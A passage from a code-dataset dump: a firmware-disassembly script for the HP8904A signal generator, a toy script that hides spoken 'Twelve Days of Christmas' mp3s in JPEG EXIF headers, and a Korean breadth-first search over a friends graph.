Frequency\",\n\t\"RUNC\":\t\"Run cont.\",\n\t\"RUNM\": \"Run man.\",\n\t\"RUNS\":\t\"Run single\",\n\t\"STOP\":\t\"Stop Run mode\",\n\t\"AM\":\t\"AM mod.\",\n\t\"FM\":\t\"FM mod.\",\n\t\"PM\":\t\"PM mod.\",\n\t\"DS\":\t\"DSB mod.\",\n\t\"PU\":\t\"Pulse mod.\",\n\t\"APH\":\t\"Tone/DTMF Amplitude\",\n\t\"DAPH\":\t\"Dig.Seq. On Level\",\n\t\"DAPL\":\t\"Dig.Seq. Off Level\",\n\t\"BSB\":\t\"Dig.Seq. Binary Base\",\n\t\"BSO\":\t\"Dig.Seq. Octal Base\",\n\t\"BSH\":\t\"Dig.Seq. Hex Base\",\n\t\"STOF\":\t\"Tone/DTMF Off time\",\n\t\"STON\":\t\"Tone/DTMF On time\",\n\t\"SBP\":\t\"Dig.Seq. Period\",\n\t\"HRA\":\t\"Tone/DTMF Register Number\",\n\t\"APA\":\t\"Amplitude A\",\n\t\"APB\":\t\"Amplitude B\",\n\t\"APC\":\t\"Amplitude C\",\n\t\"APD\":\t\"Amplitude D\",\n\t\"BO\":\t\"Backlight On\",\n\t\"BF\":\t\"Backlight Off\",\n\t\"BP\":\t\"Beep\",\n\t\"DEA\":\t\"Destination\",\n\t\"DEB\":\t\"Destination\",\n\t\"DEC\":\t\"Destination\",\n\t\"DED\":\t\"Destination\",\n\t\"EM\":\t\"Exit\",\n\t\"FS\":\t\"Filter\",\n\t\"FC\":\t\"Float Control\",\n\t\"FRA\":\t\"Frequency\",\n\t\"FRB\":\t\"Frequency\",\n\t\"FRC\":\t\"Frequency\",\n\t\"FRD\":\t\"Frequency\",\n\t\"GM\":\t\"Goto Mode\",\n\t\"HP\":\t\"Help\",\n\t\"ID\":\t\"Id\",\n\t\"IS\":\t\"Increment Set\",\n\t\"OF\":\t\"Off\",\n\t\"ON\":\t\"On\",\n\t\"OO\":\t\"Output Control\",\n\t\"PHA\":\t\"Phase\",\n\t\"PHB\":\t\"Phase\",\n\t\"PHC\":\t\"Phase\",\n\t\"PHD\":\t\"Phase\",\n\t\"PR\":\t\"Phase Reset\",\n\t\"PS\":\t\"Instrument Preset\",\n\t\"RC\":\t\"Recall\",\n\t\"RP\":\t\"Reverse Power\",\n\t\"SV\":\t\"Save\",\n\t\"RM\":\t\"Read Service Req Mask\",\n\t\"SM\":\t\"Set Service Req Mask\",\n\t\"SF\":\t\"Special Function\",\n\t\"RSF\":\t\"Read Special Function\",\n\t\"EO\":\t\"Read External Reference Status\",\n\t\"WFA\":\t\"Waveform\",\n\t\"WFB\":\t\"Waveform\",\n\t\"WFC\":\t\"Waveform\",\n\t\"WFD\":\t\"Waveform\",\n}\n\n#######################################################################\n\ndef symb(pj, cpu):\n\tfor p,a,n in [\n\t\t(0, 0x4018, \"MAIN_MENUS\"),\n\t\t(0, 0x43bd, \"HOP_RAM_ADRS\"),\n\t\t(0, 0x4908, \"HOP_CFG\"),\n\t\t(0, 0x4ed8, \"0x4ed8\"),\t\t# @0:54cb -> 3b85\n\t\t(0, 0x51e3, \"0x51e3\"),\t\t# @1:55bc -> 2213\n\t\t(0, 0x5253, \"0x5253\"),\t\t# @0:54d1 -> 2213\n\t\t(0, 0x5d0c, \"0x5d0c\"),\t\t# @0:54bf -> 220f\n\n\t\t(1, 0x42d1, \"0x42d1\"),\t\t# @1:6cc4\n\t\t(1, 0x444c, \"0x444c\"),\t\t# @1:6cb1\n\t\t(1, 0x4567, \"0x4567\"),\t\t# @1:5517\n\t\t(1, 0x4c01, \"0x4c01\"),\t\t# @1:550b -> 220f\n\t\t(1, 0x5185, \"0x5185\"),\t\t# @1:5511 -> 2211\n\t\t(1, 0x51e3, \"0x51e3\"),\t\t# @1:55bf -> 2213\n\t\t(1, 0x55c5, \"APP_TONE\"),\n\t\t(1, 0x7870, \"0x7870\"),\t\t# @1:79e5\n\t\t(1, 0x7a81, \"APP_DTMF\"),\n\t\t(1, 0x47fa, \"TONE_NBR\"),\n\t\t(1, 0x4842, \"TONE_ON_TIME\"),\n\t\t(1, 0x492c, \"TONE_F3\"),\n\t\t(1, 0x4860, \"TONE_OFF_TIME\"),\n\t\t(1, 0x71b4, \"TSEQ_INDEX\"),\n\t\t(1, 0x726a, \"TSEQ_HEX\"),\n\t\t(1, 0x7203, \"TSEQ_EDIT\"),\n\t\t(1, 0x71de, \"TSEQ_END\"),\n\t\t(1, 0x49ee, \"TSEQ_NBR\"),\n\t\t(1, 0x4a19, \"TSEQ_CONT\"),\n\t\t(1, 0x4aa2, \"TSEQ_SINGLE\"),\n\t\t(1, 0x4ab9, \"TSEQ_STOP\"),\n\n\t\t(2, 0x4196, \"0x4196\"),\t\t# @2:543a\n\t\t(2, 0x642e, \"0x642e\"),\t\t# @2:6581\n\t\t(2, 0x6646, \"0x6646\"),\t\t# @2:72f0\n\t\t(2, 0x6ad0, \"0x6ad0\"),\t\t# @2:72e4 -> 220f\n\t\t(2, 0x6f60, \"0x6f60\"),\t\t# @2:72ea -> 2211\n\t\t(2, 0x6fbe, \"0x6fbe\"),\t\t# @2:735b -> 2213\n\t\t(2, 0x7364, \"APP_DSEQ\"),\n\t\t(2, 0x689b, \"DSEQ_BASE\"),\n\t\t(2, 0x6940, \"DSEQ_ON_LEVEL\"),\n\t\t(2, 0x6917, \"DSEQ_PERIOD\"),\n\t\t(2, 0x6976, \"DSEQ_OFF_LEVEL\"),\n\t\t(2, 0x5b24, \"DSEQ_INDEX\"),\n\t\t(2, 0x5b4e, \"DSEQ_END\"),\n\t\t(2, 0x5bda, \"DSEQ_HEX\"),\n\t\t(2, 0x5b73, \"DSEQ_EDIT\"),\n\t\t(2, 0x69ed, \"DSEQ_BIT\"),\n\t\t(2, 0x6a18, \"DSEQ_CONT\"),\n\t\t(2, 0x6aa1, \"DSEQ_SINGLE\"),\n\t\t(2, 0x6ab8, \"DSEQ_STOP\"),\n\n\t\t(3, 0x471c, \"ROM_CHECK\"),\n\t\t(3, 0x4803, \"0x4803\"),\t\t# @3:4b72 -> 23b0\n\t\t(3, 0x4848, \"0x4848\"),\n\t\t(3, 0x4b1e, \"KEYBOARD_CHECK\"),\n\t\t(3, 0x4b85, \"0x4b85\"),\t\t# @3:4c51 -> 220f\n\t\t(3, 0x4c26, \"APP_DIAG\"),\n\t\t(3, 0x4dcf, \"RAM_CHECK\"),\n\t\t(3, 0x4ef7, \"LCD_CHECK\"),\n\t\t(3, 0x50ce, \"0x50ce\"),\t\t# @3:52f2 -> 220f\n\t\t(3, 0x5298, \"MEM_ACCESS\"),\n\t\t(3, 0x530f, \"PLL_CHECK\"),\n\t\t(3, 0x5914, \"0x5914\"),\t\t# @3:5f7f -> 220f\n\t\t(3, 0x5ec8, \"MANUAL_COWCHIP\"),\n\t\t(3, 0x5f96, \"0x5f96\"),\t\t# @3:6230\n\t\t(3, 0x61bb, \"MANUAL_MEMORY\"),\n\t\t(3, 0x6a25, \"0x6a25\"),\t\t# @3:7323 -> 220d\n\t\t(3, 0x6d64, \"0x6d64\"),\t\t# @3:6f6d -> 220d\n\t\t(3, 0x6f80, \"0x6f80\"),\t\t# @3:7233 -> 220d\n\t\t(3, 0x7246, \"APP_XX5\"),\n\t\t(3, 0x7ac3, \"APP_XX6\"),\n\t\t(3, 0x7b7a, \"0x7b7a\"),\n\n\t\t(4, 0x89aa, \"0x89aa\"),\n\t\t(4, 0x8a08, \"SET_MENU\"),\n\t\t(4, 0x8a2f, \"0x8a2f\"),\n\t\t(4, 0x8b4c, \"MENU_EXIT\"),\n\t\t(4, 0x8c14, \"0x8c14\"),\t\t# @0x8d51,0x8edb -> 220f\n\t\t(4, 0x90c9, \"0x90c9\"),\n\t\t(4, 0x9a40, \"0x9a40\"),\t\t# #0x9199\n\t\t(4, 0x9a47, \"0x9a48\"),\t\t# #0x917a\n\t\t(4, 0x9a4b, \"0x9a4b\"),\t\t# #0x9189\n\t\t(4, 0x975e, \"0x975e\"),\n\t\t(4, 0x9b08, \"0x9b08\"),\n\t\t(4, 0x9b70, \"0x9b70\"),\n\t\t(4, 0x9da2, \"0x9da2\"),\n\t\t(4, 0x9e53, \"0x9e53\"),\t\t# @0x8d51,0x8edb -> 220f\n\t\t(4, 0x9e7a, \"0x9e7a\"),\n\t\t(4, 0xa0d4, \"0xa0d4\"),\n\t\t(4, 0xa23f, \"0xa23f\"),\n\t\t(4, 0xa3e3, \"0xa3e3\"),\n\t\t(4, 0xaba9, \"0xaba9\"),\n\t\t(4, 0xabef, \"0xabef\"),\n\t\t(4, 0xb8ad, \"0xb8ad\"),\n\t\t(4, 0xb8cc, \"0xb8cc\"),\n\t\t(4, 0xc1e3, \"0xc1e3\"),\n\t\t(4, 0xc239, \"NULL\"),\n\t\t(4, 0xc242, \"MEMCMP\"),\n\t\t(4, 0xc285, \"MEMCPY\"),\n\t\t(4, 0xc418, \"0xc418\"),\n\t\t(4, 0xc7b0, \"0xc7b0\"),\n\t\t(4, 0xc855, \"0xc855\"),\n\t\t(4, 0xc885, \"0xc885\"),\n\t\t(4, 0xc973, \"0xc973\"),\n\t\t(4, 0xcb10, \"0xcb10\"),\n\t\t(4, 0xcc09, \"0xcc09\"),\n\t\t(4, 0xccb5, \"0xccb5\"),\n\t\t(4, 0xccff, \"0xccff\"),\n\t\t(4, 0xcd50, \"0xcd50\"),\n\t\t(4, 0xd022, \"0xd022\"),\n\t\t(4, 0xd17d, \"0xd17d\"),\n\t\t(4, 0xd2c6, \"0xd2c6\"),\n\t\t(4, 0xd37d, \"NUM=\"),\n\t\t(4, 0xd3c6, \"NUM-\"),\n\t\t(4, 0xd392, \"NUM+\"),\n\t\t(4, 0xd57c, \"0xd57c\"),\n\t\t(4, 0xd71d, \"LCD_WR_CTRL\"),\n\t\t(4, 0xd73f, \"LCD_WR_DATA\"),\n\t\t(4, 0xd761, \"LCD_RD_DATA\"),\n\t\t(4, 0xd781, \"LCD_RD_CTRL\"),\n\t\t(4, 0xd7a0, \"LCD_DDRAM\"),\n\t\t(4, 0xd8ea, \"DISPLAY\"),\n\t\t(4, 0xd989, \"DISPLAY2L\"),\n\t\t(4, 0xd9e6, \"LCD_INIT\"),\n\t\t(4, 0xdae0, \"BANKSWITCH\"),\n\t\t(4, 0xdb2b, \"CALL_BANK\"),\n\t\t(4, 0xdc7b, \"RAM_ROM_TEST\"),\n\t\t(4, 0xdc82, \"RAM_TEST\"),\n\t\t(4, 0xdca9, \"ROM_SUM\"),\n\t\t(4, 0xdd1e, \"APP_JMP\"),\n\t\t(4, 0xdeb6, \"0xdeb6\"),\n\t\t(4, 0xe029, \"0xe029\"),\n\t\t(4, 0xe185, \"0xe185\"),\n\t\t(4, 0xe319, \"0xe319\"),\n\t\t(4, 0xe69c, \"0xe69c\"),\n\t\t(4, 0xe8a7, \"0xe8a7\"),\n\t\t(4, 0xf02a, \"0xf02a\"),\n\t\t(4, 0xf044, \"0xf044\"),\n\t\t(4, 0xf1d9, \"0xf1d9\"),\n\t\t(4, 0xf3f0, \"0xf3f0\"),\n\t\t(4, 0xf7ec, \"0xf7ec\"),\n\t\t(4, 0xf9d4, \"0xf9d4\"),\n\t\t(4, 0xfd50, \"PROLOGUE\"),\n\n\t\t(6, 0x0300, \"LCD_CTL\"),\n\t\t(6, 0x0301, \"LCD_DATA\"),\n\t\t(6, 0x2223, \"MAIN_MENU_LAST_PG\"),\n\t\t(6, 0x2240, \"MENU_PTR\"),\n\t\t(6, 0x2245, \"MAIN_MENU_CUR_PG\"),\n\t\t(6, 0x2242, \"MENU_CNT\"),\n\t\t(6, 0x247b, \"CUR_BANK\"),\n\t\t(6, 0x247c, \"APP_BANK\"),\n\t\t(6, 0x247d, \"APP_VECTOR\"),\n\t\t(6, 0x3ffc, \"OPTIONS\"),\n\t\t(6, 0xed11, \"blank_line\"),\n\t]:\n\t\tif p == pj.pg:\n\t\t\tassert a >= pj.m.lo and a < pj.m.hi\n\t\t\tcpu.disass(pj, a)\n\t\tif p == pj.pg or p >= 4:\n\t\t\tpj.set_label(a, n)\n\n\n#######################################################################\n\ndef romsum(pj):\n\tb = 0\n\tc = 0\n\tfor x in range(pj.m.lo, pj.m.hi):\n\t\tb += pj.m.rd(x) + c\n\t\tc = b >> 8\n\t\tc = 1\n\t\tb &= 0xff\n\tprint(\"CKSUM(0x%04x-0x%04x) = 0x%x\" % (pj.m.lo, pj.m.hi, b))\n\n\tif pj.pg == 0:\n\t\ty = data.Const(pj, 0x4002, 0x4003)\n\t\tpj.set_label(y.lo, \"EPROM_PAGES\")\n\n\tif pj.pg < 4:\n\t\tassert b == pj.pg\n\n\t\ty = data.Const(pj, 0x4001, 0x4002)\n\t\tpj.set_label(y.lo, \"EPROM_SUM_%d\" % pj.pg)\n\n\t\ty = data.Const(pj, 0x4000, 0x4001, \"'%c'\")\n\t\tassert pj.m.rd(y.lo) == 0x30 + pj.pg\n\t\tpj.set_label(y.lo, \"EPROM_PAGE_%d\" % pj.pg)\n\n\telse:\n\t\tassert b == 0\n\n#######################################################################\n\ndef lexer(pj):\n\n\tassert pj.pg == 4\n\n\tclass lex(data.Data):\n\t\tdef __init__(self, pj, lo, pfx):\n\t\t\thi = lo + 4\n\t\t\tself.f = pj.m.rd(lo + 1)\n\t\t\tself.t = pj.m.bu16(lo + 2)\n\t\t\tself.pfx = pfx + \"%c\" % pj.m.rd(lo)\n\t\t\tif self.f > 0:\n\t\t\t\thi += 1\n\t\t\tsuper(lex, self).__init__(pj, lo, hi, \"lex\")\n\t\t\tif self.f > 0 and self.pfx in hpib:\n\t\t\t\tself.lcmt += hpib[self.pfx] + \"\\n\"\n\t\t\tself.compact = True\n\t\t\tif self.f > 0:\n\t\t\t\tpj.set_label(self.t, \"J_\" + self.pfx)\n\t\t\t\tcpu.disass(pj, self.t)\n\n\t\tdef render(self, pj):\n\t\t\ts = \".LEX\\t\\\"%s\\\", \" % self.pfx\n\t\t\ts += \"%d, \" % pj.m.rd(self.lo + 1)\n\t\t\ts += pj.render_adr(pj.m.bu16(self.lo + 2))\n\t\t\tif self.f:\n\t\t\t\ts += \", 0x%02x\" % pj.m.rd(self.lo + 4)\n\t\t\treturn s\n\n\tdef tx(a, pfx):\n\t\tt0 = a\n\t\twhile pj.m.rd(a) != 0:\n\t\t\ty = lex(pj, a, pfx)\n\t\t\ta = y.hi\n\t\t\tif y.f == 0:\n\t\t\t\tb = pj.m.bu16(y.lo + 2)\n\t\t\t\tp = pfx + \"%c\" % pj.m.rd(y.lo)\n\t\t\t\tpj.set_label(b, \"LEX_\" + p)\n\t\t\t\ttx(b, p)\n\t\tdata.Const(pj, a, a + 1)\n\n\tpj.set_label(0x9780, \"LEXTAB_ALPHABET\")\n\tn = 65\n\tfor i in range(0x9780, 0x97b4, 2):\n\t\tdata.Dataptr(pj, i, i + 2, pj.m.bu16(i))\n\t\ta = pj.m.bu16(i)\n\t\tif n != 0x5a:\n\t\t\tpj.set_label(a, \"LEX_%c\" % n)\n\t\telse:\n\t\t\tpj.set_label(a, \"LEX_NULL\")\n\t\ttx(a, \"%c\" % n)\n\t\tn += 1\n\n\tpj.set_label(0x9a22, \"LEXTAB_OTHER\")\n\ttx(0x9a22, \"\")\n\n#######################################################################\n# Switch statements\n\ndef do_switch():\n\tretval=False\n\tfor i in pj:\n\t\tif i.tag != \"mc6809\":\n\t\t\tcontinue\n\t\tif pj.m.bu16(i.lo) != 0x6e9b:\n\t\t\tcontinue\n\t\tfor j in pj.gaps():\n\t\t\tif j[0] == i.hi:\n\t\t\t\tbreak\n\t\tif j[0] != i.hi:\n\t\t\tcontinue\n\t\tprint(\"SWITCH\", i, \"%04x-%04x\" % (j[0], j[1]))\n\t\tretval=True\n\t\tfor k in range(j[0], j[1], 2):\n\t\t\t# print(\" %04x\" % k)\n\t\t\tx = pj.t.find_lo(k)\n\t\t\tif len(x) > 0:\n\t\t\t\tbreak\n\t\t\tx = pj.m.bu16(k)\n\t\t\ti.add_flow(pj, \">JC\", \"EQ\", x, i.lang)\n\t\t\tcpu.disass(pj, x)\n\t\t\twhile pj.run():\n\t\t\t\tpass\n\t\tfor l in range(j[0], k + 2, 2):\n\t\t\tcpu.codeptr(pj, l)\n\treturn retval\n\n#######################################################################\n\nclass Num(data.Data):\n\tdef __init__(self, pj, lo):\n\t\tsuper(Num, self).__init__(pj, lo, lo + 3, \"Num\")\n\t\ta = pj.m.rd(lo) << 16\n\t\ta += pj.m.rd(lo + 1) << 8\n\t\ta += pj.m.rd(lo + 2)\n\t\tself.fmt = \".NUM\\t%d\" % a\n\t\tpj.set_label(lo, \"N%d\" % a)\n\n#######################################################################\n\nclass MenuPage(data.Data):\n\tdef __init__(self, pj, cpu, lo):\n\t\tsuper(MenuPage, self).__init__(pj, lo, lo + 10, \"MenuPage\")\n\t\tt = pj.m.bu16(lo)\n\t\ty1 = data.Txt(pj, t, t + 40, label=False)\n\t\ty1.compact = True\n\t\ty2 = data.Txt(pj, t + 40, t + 80, label=False)\n\t\ty2.compact = True\n\t\tself.t1 = y1.txt\n\t\tself.t2 = y2.txt\n\t\tself.ptr = []\n\t\tfor i in range(1, 5):\n\t\t\tu = pj.m.bu16(lo + 2 * i)\n\t\t\tself.ptr.append(u)\n\t\t\tif u >= pj.m.lo and u < pj.m.hi:\n\t\t\t\tcpu.disass(pj, u)\n\n\tdef render(self, pj):\n\t\ts = \"MENUPAGE {\\n\"\n\t\ts += \"\\t.txt1 = \\\"%s\\\"\\n\" % self.t1\n\t\ts += \"\\t.txt2 = \\\"%s\\\"\\n\" % self.t2\n\t\tfor i in range(4):\n\t\t\ts += \"\\t.f%d = \" % (i + 1)\n\t\t\ts += \"%s\\n\" % pj.render_adr(self.ptr[i])\n\t\ts += \"}\"\n\t\treturn s\n\ndef Menu(pj, cpu, a, nm):\n\tpj.set_label(a, nm)\n\tdata.Const(pj, a - 1, a)\n\tn = pj.m.rd(a - 1)\n\tfor i in range(0, n + 1):\n\t\tMenuPage(pj, cpu, a + i * 10)\n\n#######################################################################\n\ndef hints(pj, cpu):\n\n\tif pj.pg == 0:\n\t\tMenu(pj, cpu, 0x433e, \"CHANMENU\")\n\n\t\t# @0x8948\n\t\tdata.Const(pj, 0x4003, 0x4004)\n\n\t\t# @0x8954\n\t\tfor a in range(0x4004,0x4008,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\t# @0x8960\n\t\tfor a in range(0x4008,0x4018,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\tfor a in range(0x4018, 0x4022, 2):\n\t\t\ty = data.Dataptr(pj, a, a + 2, pj.m.bu16(a))\n\t\t\tu = pj.m.bu16(a)\n\t\t\ty = data.Txt(pj, u, u + 40, label=False)\n\t\t\ty.compact = True\n\n\t\t# @8e1a, @8f08\n\t\tfor a in range(0x4022,0x4026,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\t# @0xc4a5, @0xc318\n\t\tfor a in range(0x404f,0x4053,2):\n\t\t\tcpu.codeptr(pj, a)\n\n\t\tfor a in (0x4027, 0x411b, 0x4143, 0x416b, 0x4193):\n\t\t\ty = data.Txt(pj, a, a + 0x28, label=False)\n\t\t\ty.compact = True\n\n\t\ty = data.Txt(pj, 0x41bb, 0x41bb + 12, label=False)\n\t\ty.compact = True\n\n\n\tif pj.pg == 1:\n\t\tMenu(pj, cpu, 0x416b, \"TONEMENU\")\n\t\tMenu(pj, cpu, 0x4234, \"DTMFMENU\")\n\n\t\tfor a in (0x69a6,):\n\t\t\ty = data.Txt(pj, a, a + 0x28, label=False)\n\t\t\ty.compact = True\n\t\tfor a in (0x4142,0x4156):\n\t\t\ty = data.Txt(pj, a, a + 0x14, label=False)\n\t\t\ty.compact = True\n\t\tfor a in range(0x43bc, 0x43f2, 3):\n\t\t\tdata.Const(pj, a, a + 3)\n\n\tif pj.pg == 2:\n\t\tMenu(pj, cpu, 0x416b, \"DSEQMENU\")\n\t\tfor a in range(0x4245, 0x4255, 2):\n\t\t\tcpu.codeptr(pj, a)\n\t\tfor a in range(0x4330, 0x4340, 2):\n\t\t\tcpu.codeptr(pj, a)\n\n\tif pj.pg == 3:\n\t\tMenu(pj, cpu, 0x4178, \"DIAGMENU\")\n\t\tMenuPage(pj, cpu, 0x4196)\n\t\tfor i in range(0x3f):\n\t\t\ta = 0x7349 + 4 * i\n\t\t\ty = data.Const(pj, a, a + 2)\n\t\t\ty.typ = \".BYTE\"\n\t\t\ty.fmt = \"%d, %d\" % (pj.m.rd(a), pj.m.rd(a + 1))\n\t\t\tu = pj.m.bu16(a + 2)\n\t\t\tl = pj.m.rd(a + 1)\n\t\t\tdata.Dataptr(pj, a + 2, a + 4, pj.m.bu16(a + 2))\n\t\t\ty = data.Txt(pj, u, u + l, label=False)\n\t\t\ty.compact = True\n\t\tfor a,b in (\n\t\t\t(0x4002,53),\n\t\t\t(0x41a0,40),\n\t\t\t(0x41c8,0x1a),\n\t\t\t(0x41e2,40),\n\t\t\t(0x420a,40),\n\t\t\t(0x4232,16),\n\t\t\t(0x4242,16),\n\t\t\t(0x4252,40),\n\t\t\t(0x4292,0x1a),\n\t\t\t(0x42ac,40),\n\t\t\t(0x42d4,0x1a),\n\t\t\t(0x42ee,0x1a),\n\t\t\t(0x4308,40),\n\t\t\t(0x4330,40),\n\t\t\t(0x4358,40),\n\t\t\t(0x4386,0x1a),\n\t\t\t(0x43a0,12),\n\t\t\t(0x43ac,40),\n\t\t\t(0x43d4,40),\n\t\t\t(0x43fc,0x1a),\n\t\t\t(0x4416,40),\n\t\t\t(0x443e,40),\n\t\t\t(0x4466,6),\n\t\t\t(0x66fa,16),\n\t\t\t(0x670a,40),\n\t\t\t(0x6732,40),\n\t\t\t(0x675a,40),\n\t\t\t(0x6782,40),\n\t\t\t(0x67aa,40),\n\t\t\t(0x67d2,40),\n\t\t\t(0x67fa,40),\n\t\t\t(0x681a,40),\n\t\t\t(0x6822,40),\n\t\t):\n\t\t\ty = data.Txt(pj, a, a + b, label=False)\n\t\t\ty.compact = True\n\n\t\tfor a in range(0x63b2, 0x66fa, 40):\n\t\t\ty = data.Txt(pj, a, a + 40, label=False)\n\t\t\ty.compact = True\n\n\t\ta = 0x4c64\n\t\twhile a < 0x4dcb:\n\t\t\ty = data.Txt(pj, a)\n\t\t\ty.compact = True\n\t\t\ta = y.hi\n\n\t\ta = 0x54cf\n\t\twhile a < 0x550d:\n\t\t\ty = data.Txt(pj, a)\n\t\t\ty.compact = True\n\t\t\ta = y.hi\n\n\t\ta = 0x624d\n\t\twhile a < 0x63a4:\n\t\t\ty = data.Txt(pj, a)\n\t\t\ty.compact = True\n\t\t\ta = y.hi\n\n\n\tif pj.pg == 4:\n\t\tdata.Const(pj, 0xfd6e, 0xfd70)\n\t\tfor a in range(0xee62, 0xee88, 2):\n\t\t\tu = pj.m.bu16(a)\n\t\t\ty = data.Dataptr(pj, a, a + 2, u)\n\t\t\ty = data.Const(pj, u, u + 1)\n\t\t\ty = data.Txt(pj, u + 1, u + 1 + pj.m.rd(u), label=False)\n\t\t\ty.compact = True\n\t\tfor a in range(0xeeee, 0x0ef0e, 2):\n\t\t\tu = pj.m.bu16(a)\n\t\t\ty = data.Dataptr(pj, a, a + 2, u)\n\t\t\ty = data.Const(pj, u, u + 1)\n\t\t\ty = data.Txt(pj, u + 1, u + 1 + pj.m.rd(u), label=False)\n\t\t\ty.compact = True\n\t\tfor a in range(0xef94, 0xf014, 8):\n\t\t\ty = data.Const(pj, a, a + 8, fmt=\"0x%02x\")\n\n\t\tfor a,b in (\n\t\t\t(0x8f7c,35),\n\t\t\t(0x977b, 5),\n\t\t\t(0xed11,40),\n\t\t\t(0xea99,0x23),\n\t\t\t(0xeae4,13),\n\t\t\t(0xeb41,40),\n\t\t\t(0xeb69,40),\n\t\t\t(0xec5b,14),\n\t\t\t(0xec69,14),\n\t\t\t(0xec77,14),\n\t\t\t(0xec85,0x36),\n\t\t\t(0xecbb,6),\n\t\t\t(0xecc1,40),\n\t\t\t(0xece9,40),\n\t\t):\n\t\t\ty = data.Txt(pj, a, a + b, label=False)\n\t\t\ty.compact = True\n\n\t\tdef char_def(pj, a):\n\t\t\tfor i in range(8):\n\t\t\t\ty = data.Data(pj, a + i, a + i + 1)\n\t\t\t\tx = pj.m.rd(a + i)\n\t\t\t\ty.fmt = \".BITS\\t\"\n\t\t\t\tfor j in range(8):\n\t\t\t\t\tif x & 0x80:\n\t\t\t\t\t\ty.fmt += \"#\"\n\t\t\t\t\telse:\n\t\t\t\t\t\ty.fmt += \"-\"\n\t\t\t\t\tx = x << 1\n\n\t\tl = [ \"LCD_CHR_f\", \"LCD_CHR_1\", \"LCD_CHR_2\", \"LCD_CHR_3\",\n\t\t \"LCD_CHR_4\", \"LCD_CHR_phi\", \"LCD_CHR_mu\", \"LCD_CHR_is\", ]\n\t\tfor a in range(0xea15, 0xea4e, 8):\n\t\t\tpj.set_label(a, l.pop(0))\n\t\t\tchar_def(pj, a)\n\n\t\tdata.Const(pj, 0x929d, 0x929d + 8)\n\t\tdata.Const(pj, 0x9777, 0x9777 + 4)\n\t\tdata.Const(pj, 0xdd73, 0xdd9d)\n\n\t\t# 2 x 35 bytes, no idea...\n\t\tfor a in range(0xed89, 0xedcf, 5):\n\t\t\tdata.Const(pj, a, a + 5, \"0x%02x\")\n\n\t\tfor a in range(0xee47, 0xee62, 3):\n\t\t\tNum(pj, a)\n\n\t\tfor a in (0xea55, 0xea58, 0xea5f, 0xea62, 0xea65,\n\t\t 0xea68, 0xea6b, 0xea6e):\n\t\t\tNum(pj, a)\n\n\n#######################################################################\n# Function prologues\n\ndef prologues(pj, cpu):\n\tfor i in pj:\n\t\tif i.tag != \"mc6809\":\n\t\t\tcontinue\n\t\tif i.dstadr != 0xfd50:\n\t\t\tcontinue\n\t\tj = pj.t.find_hi(i.lo)\n\t\tif len(j) == 0:\n\t\t\tprint(\"NO PROLOGUE %04x\" % i.lo, i)\n\t\t\tcontinue\n\t\tif pj.m.rd(j[0].lo) == 0xfc:\n\t\t\tj[0].mne=\"ldd__\"\n\t\t\tu = pj.m.bu16(j[0].lo + 1)\n\t\t\tv = pj.m.bu16(u)\n\t\t\tj[0].mne=\"ldd__%d\" % v\n\t\t\tdata.Const(pj, u, u + 1)\n\t\t\tdata.Const(pj, u + 1, u + 2)\n\n#######################################################################\n\nfor pg in (0,1,2,3,4):\n\n\tpj,m = setup(pg)\n\n\tromsum(pj)\n\n\tcpu = mc6809.mc6809()\n\n\thints(pj, cpu)\n\n\tsymb(pj, cpu)\n\n\tif pj.pg == 4:\n\t\tlexer(pj)\n\t\tcpu.vectors(pj)\n\n\twhile pj.run():\n\t\tpass\n\n\twhile do_switch():\n\t\tcontinue\n\n\twhile pj.run():\n\t\tpass\n\n\tprologues(pj, cpu)\n\n\tcode.lcmt_flows(pj)\n\n\tlisting.Listing(pj)\n\n\timport example2\n\n\texample2.analyse(pj)\n\n\tpj.name = pj.name + \"_A\"\n\n\tlisting.Listing(pj)\n","sub_path":"examples/HP8904A/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":18247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"140498767","text":"from gtts import gTTS\nfrom stegano import exifHeader\nimport os\n\nfirst = 'A partridge in a pear tree'\nsecond = 'two turtle doves'\nthird = 'three french hens'\nfourth = 'four calling birds'\nfifth = 'five golden rings'\nsixth = 'six geese a laying'\nseventh = 'seven swans a swimming'\neigth = 'eigth maids a milking'\nnineth = 'nine ladies dancing'\ntenth = 'ten lords a leaping'\neleventh = 'eleven pipers piping'\ntwelfth = 'twelve drummers drumming'\n\nsong = [first, second, third, fourth, fifth, sixth, seventh, eigth, nineth, tenth, eleventh, twelfth]\n\nos.chdir('part_1_output')\n\ndef get_bytes_from_file(filename): \n return open(filename, \"rb\").read() \n\n# Iterate over song list and convert them to mp3.\nfor item in song:\n myobj = gTTS(text=item, lang='en', slow=False)\n myobj.save(f\"{item}.mp3\") \n\npicture_num = 0\n# Iterate over the songs and copy them to their own secret picture\nfor file in os.listdir():\n picture_num += 1\n if file == 'cactus.jpeg' or file == '.DS_Store':\n continue\n print(file)\n bytes = get_bytes_from_file(file)\n secret = exifHeader.hide(\"cactus.jpeg\",f\"secret_{picture_num}.jpeg\", bytes)\n\nfor file in os.listdir():\n if 'mp3' in file:\n os.remove(file)","sub_path":"part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"213183203","text":"def print_all_friends(g, start):\n qu = [] # 앞으로 처리해야 할 사람들을 큐에 저장\n done = set() # 이미 큐에 추가한 사람들을 집합에 기록(중복 방지)\n \n qu.append((start, 0)) # 사람들의 정보를 하나의 튜플로 묶어 처리, 자기 자신의 친밀도: 0\n done.add(start) # 집합에도 추가\n \n while qu: # 큐에 처리할 사람들이 남아 있는 동안\n (p, d) = qu.pop(0) # 큐에서 정보를 p와 d로 각각 꺼냄\n print(p, d) # 사람 이름과 친밀도를 출력\n for x in g[p]: # 친구들 중에\n if x not in done: # 아직 큐에 추가된 없는 사람을\n qu.append((x, d + 1)) # 친밀도를 1 증가시겨 큐에 추가하고\n done.add(x) # 집합에도 추가\n\nfriend_info = {\n 'Summer': ['John', 'Justin', 'Mike'],\n 'John': ['Summer', 'Justin'],\n 'Justin': ['John', 'Summer', 'Mike', 'May'],\n 'Mike': ['Summer', 'Justin'],\n 'May': ['Justin', 'Kim'],\n 'Kim': ['May'],\n 'Tom': ['Jerry'],\n 'Jerry': ['Tom']\n}\n\nprint_all_friends(friend_info, 'Summer')\nprint()\nprint_all_friends(friend_info, 